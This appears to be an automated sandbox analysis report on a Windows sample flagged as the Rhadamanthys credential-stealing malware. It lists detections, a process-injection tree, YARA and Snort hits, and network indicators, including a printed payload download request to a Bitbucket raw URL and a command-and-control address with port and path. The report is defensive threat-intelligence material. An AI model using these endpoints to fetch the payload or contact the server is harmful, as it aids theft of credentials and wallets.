Edit tour

Windows Analysis Report
nF54KOU30R.exe

Overview

General Information

Sample name:	nF54KOU30R.exe (renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name:	75a515dcf017365b0feee7b1be20126df7066ca2fa0a7718009279f50dabc5fc
Analysis ID:	1446953
MD5:	ea37157ee7ab8afb57a0f8e09afc8bec
SHA1:	adb8dd210e87687ce11781f3003aaadff9698dcc
SHA256:	75a515dcf017365b0feee7b1be20126df7066ca2fa0a7718009279f50dabc5fc
Infos:

Detection

RHADAMANTHYS

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected RHADAMANTHYS Stealer

.NET source code contains potential unpacker

AI detected suspicious sample

Allocates memory in foreign processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Checks if the current process is being debugged

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to detect virtual machines (STR)

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query network adapater information

Contains functionality to read the PEB

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Found inlined nop instructions (likely shell or obfuscated code)

IP address seen in connection with other malware

Installs a raw input device (often for capturing keystrokes)

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

One or more processes crash

Queries information about the installed CPU (vendor, model number etc)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Sigma detected: Dllhost Internet Connection

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara detected Keylogger Generic

Classification

Process Tree

System is w10x64

nF54KOU30R.exe (PID: 7568 cmdline: "C:\Users\user\Desktop\nF54KOU30R.exe" MD5: EA37157EE7AB8AFB57A0F8E09AFC8BEC)

MSBuild.exe (PID: 8012 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

dialer.exe (PID: 8032 cmdline: "C:\Windows\system32\dialer.exe" MD5: E4BD77FB64DDE78F1A95ECE09F6A9B85)

OpenWith.exe (PID: 6012 cmdline: "C:\Windows\system32\openwith.exe" MD5: E4A834784FA08C17D47A1E72429C5109)

wmplayer.exe (PID: 7220 cmdline: "C:\Program Files\Windows Media Player\wmplayer.exe" MD5: 89DCD2D4C0EC638AADC00D3530E07E1D)

dllhost.exe (PID: 7464 cmdline: "C:\Windows\system32\dllhost.exe" MD5: 08EB78E5BE019DF044C26B14703BD1FA)

WerFault.exe (PID: 8104 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 516 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 8136 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 8012 -s 552 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 5768 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1864 MD5: C31336C1EFC2CCB44B4326EA793040F2)

WerFault.exe (PID: 7232 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7568 -s 1980 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Rhadamanthys	According to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.	Sandworm	https://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/ https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023 https://elis531989.medium.com/dancing-with-shellcodes-analyzing-rhadamanthys-stealer-3c4986966a88 https://github.com/echocti/ECHO-Reports/blob/main/Malware%20Analysis%20Report/Rhdamanthys/Rhadamanthys-EN.pdf https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf	https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000005.00000003.1932913014.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000005.00000003.1959663003.0000000004B25000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000004.00000002.1935862914.0000000003720000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000000.00000003.1978957383.0000000003F10000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000005.00000003.1934634916.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000000.00000002.1982803526.0000000004F40000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
00000005.00000003.1934769024.0000000004DD0000.00000004.00000001.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000005.00000002.1994856642.0000000004310000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_RHADAMANTHYS	Yara detected RHADAMANTHYS Stealer	Joe Security
Process Memory Space: dialer.exe PID: 8032	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: OpenWith.exe PID: 6012	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 7 entries

Unpacked PEs

Source	Rule	Description	Author
5.3.dialer.exe.4bb0000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.3.dialer.exe.4bb0000.6.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.3.dialer.exe.4bb0000.6.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.3.dialer.exe.4dd0000.7.raw.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
5.3.dialer.exe.4bb0000.2.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security

Sigma Signatures

Sigma detected: Dllhost Internet Connection

Source: Network Connection

Author: bartblaze: Data: DestinationIp: 94.156.67.91, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\dllhost.exe, Initiated: true, ProcessId: 7464, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49741

Snort Signatures

ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert - Source IP: 94.156.67.91 - Destination IP: 192.168.2.4

Timestamp:	05/24/24-05:10:13.401057
SID:	2854802
Source Port:	6939
Destination Port:	49740
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert - Source IP: 94.156.67.91 - Destination IP: 192.168.2.4

Timestamp:	05/24/24-05:10:00.411707
SID:	2854802
Source Port:	6939
Destination Port:	49738
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert - Source IP: 94.156.67.91 - Destination IP: 192.168.2.4

Timestamp:	05/24/24-05:09:48.485817
SID:	2854802
Source Port:	6939
Destination Port:	49737
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: nF54KOU30R.exe

Avira: detected

Multi AV Scanner detection for submitted file

Source: nF54KOU30R.exe	ReversingLabs: Detection: 57%
Source: nF54KOU30R.exe	Virustotal: Detection: 60%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: nF54KOU30R.exe

Joe Sandbox ML: detected

Source: C:\Windows\System32\OpenWith.exe

Code function: 15_3_00007DF4E574FF7C CryptUnprotectData,

15_3_00007DF4E574FF7C

Source: nF54KOU30R.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.192.141.1:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 94.156.67.91:443 -> 192.168.2.4:49750 version: TLS 1.2

Source: nF54KOU30R.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2. source: OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb$I` source: OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdb source: dialer.exe, 00000005.00000003.1934515258.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934457085.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdb source: dialer.exe, 00000005.00000003.1934634916.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934769024.0000000004DD0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: dialer.exe, 00000005.00000003.1933919289.0000000004DA0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1933537331.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: dialer.exe, 00000005.00000003.1934155632.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934298926.0000000004D50000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: dialer.exe, 00000005.00000003.1933919289.0000000004DA0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1933537331.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: dialer.exe, 00000005.00000003.1934155632.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934298926.0000000004D50000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: win32u.pdb source: wmplayer.exe, wmplayer.exe, 00000010.00000003.2232497816.0000020343550000.00000004.00000001.00020000.00000000.sdmp, wmplayer.exe, 00000010.00000003.2232660082.0000020343580000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernel32.pdbUGP source: dialer.exe, 00000005.00000003.1934515258.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934457085.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: wkernelbase.pdbUGP source: dialer.exe, 00000005.00000003.1934634916.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934769024.0000000004DD0000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: win32u.pdbGCTL source: wmplayer.exe, 00000010.00000003.2232497816.0000020343550000.00000004.00000001.00020000.00000000.sdmp, wmplayer.exe, 00000010.00000003.2232660082.0000020343580000.00000004.00000001.00020000.00000000.sdmp

Source: C:\Windows\System32\OpenWith.exe

Code function: 15_3_00007DF4E5758E20 GetLogicalDriveStringsW,

15_3_00007DF4E5758E20

Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\Default\AppData	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\Default	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\Default\AppData\Local	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\Default\AppData\Local\Microsoft	Jump to behavior

Source: C:\Windows\System32\OpenWith.exe	Code function: 4x nop then dec esp	15_3_00007DF4E575BFA1
Source: C:\Windows\System32\OpenWith.exe	Code function: 4x nop then dec esp	15_2_000001F0D53B0511
Source: C:\Program Files\Windows Media Player\wmplayer.exe	Code function: 4x nop then dec esp	16_2_0000020343285641

Networking

Snort IDS alert for network traffic

Source: Traffic	Snort IDS: 2854802 ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert 94.156.67.91:6939 -> 192.168.2.4:49737
Source: Traffic	Snort IDS: 2854802 ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert 94.156.67.91:6939 -> 192.168.2.4:49738
Source: Traffic	Snort IDS: 2854802 ETPRO TROJAN Suspected Rhadamanthys Related SSL Cert 94.156.67.91:6939 -> 192.168.2.4:49740

Source: global traffic

TCP traffic: 192.168.2.4:49737 -> 94.156.67.91:6939

Source: Joe Sandbox View	IP Address: 104.192.141.1 104.192.141.1
Source: Joe Sandbox View	IP Address: 104.192.141.1 104.192.141.1

Source: Joe Sandbox View

ASN Name: TERASYST-ASBG TERASYST-ASBG

Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox View	JA3 fingerprint: caec7ddf6889590d999d7ca1b76373b6

Source: unknown	TCP traffic detected without corresponding DNS query: 104.46.162.224
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91
Source: unknown	TCP traffic detected without corresponding DNS query: 94.156.67.91

Source: C:\Windows\System32\OpenWith.exe

Code function: 15_3_00007DF4E57821BC WSARecv,

15_3_00007DF4E57821BC

Source: global traffic

HTTP traffic detected: GET /exlices2dsasd/felijsd/raw/97efb5e9acdf5e9946a2959d44a26bcaae894841/DEFSAFAAAAAAAAVCC HTTP/1.1Accept: */*User-Agent: Chrome/95.0.4638.54Host: bitbucket.org

Source: global traffic

DNS traffic detected: DNS query: bitbucket.org

Source: dialer.exe, 00000005.00000002.1994131096.000000000259C000.00000004.00000010.00020000.00000000.sdmp, dialer.exe, 00000005.00000002.1998374665.0000000004F50000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000005.00000002.1996018655.0000000004B28000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, OpenWith.exe, 0000000F.00000003.2319739898.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2256043552.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2146388100.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000002.2321330995.000001F0D737C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000002.2321549596.000001F0D7426000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2265610834.000001F0D73C9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2078385188.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000002.2321675274.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2080480545.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2147044132.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2079654830.000001F0D73C6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2081757953.000001F0D745A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2146780180.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2081590039.000001F0D743B000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2075439224.000001F0D743A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2256879858.000001F0D73C9000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2075836836.000001F0D743A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://94.156.67.91:6939/063f04131db66c38e7/27isnud6.7mv0n
Source: OpenWith.exe, 0000000F.00000003.2319739898.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2256043552.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2146388100.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2078385188.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000002.2321675274.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2080480545.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2147044132.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2079654830.000001F0D73C6000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2081757953.000001F0D745A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2146780180.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2081590039.000001F0D743B000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2075439224.000001F0D743A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2075836836.000001F0D743A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2077245236.000001F0D7444000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2116540453.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2108797615.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2077757038.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2075206262.000001F0D743A000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2147260095.000001F0D745C000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2078142726.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000003.2079158440.000001F0D73C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://94.156.67.91:6939/063f04131db66c38e7/27isnud6.7mv0n:
Source: dialer.exe, 00000005.00000002.1998374665.0000000004F50000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000005.00000002.1996018655.0000000004B28000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000002.2320836461.000001F0D53B0000.00000040.00000001.00020000.00000000.sdmp	String found in binary or memory: https://94.156.67.91:6939/063f04131db66c38e7/27isnud6.7mv0nkernelbasentdllkernel32GetProcessMitigati
Source: OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: nF54KOU30R.exe, 00000000.00000003.1915931292.0000000001013000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000002.1982141598.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com/
Source: nF54KOU30R.exe, 00000000.00000002.1982036347.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/
Source: nF54KOU30R.exe, 00000000.00000002.1982036347.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/0
Source: nF54KOU30R.exe, 00000000.00000002.1982036347.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000002.1982141598.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/exlices2dsasd/felijsd/raw/97efb5e9acdf5e9946a2959d44a26bcaae894841/DEFSAFAAAAA
Source: nF54KOU30R.exe, 00000000.00000003.1915931292.0000000001013000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000002.1982141598.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.cookielaw.org/
Source: OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d136azpfpnge1l.cloudfront.net/;
Source: nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d301sr5gafysq2.cloudfront.net/
Source: OpenWith.exe, 0000000F.00000003.2080999215.000001F0D7613000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discord.com
Source: OpenWith.exe, 0000000F.00000003.2080999215.000001F0D7613000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com
Source: OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: OpenWith.exe, 0000000F.00000003.2075653231.000001F0D7633000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: nF54KOU30R.exe, 00000000.00000003.1915931292.0000000001013000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000002.1982141598.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
Source: nF54KOU30R.exe, 00000000.00000003.1915931292.0000000001013000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000002.1982141598.0000000000FF6000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000003.1916214760.0000000000FF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
Source: OpenWith.exe, 0000000F.00000003.2078142726.000001F0D73A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
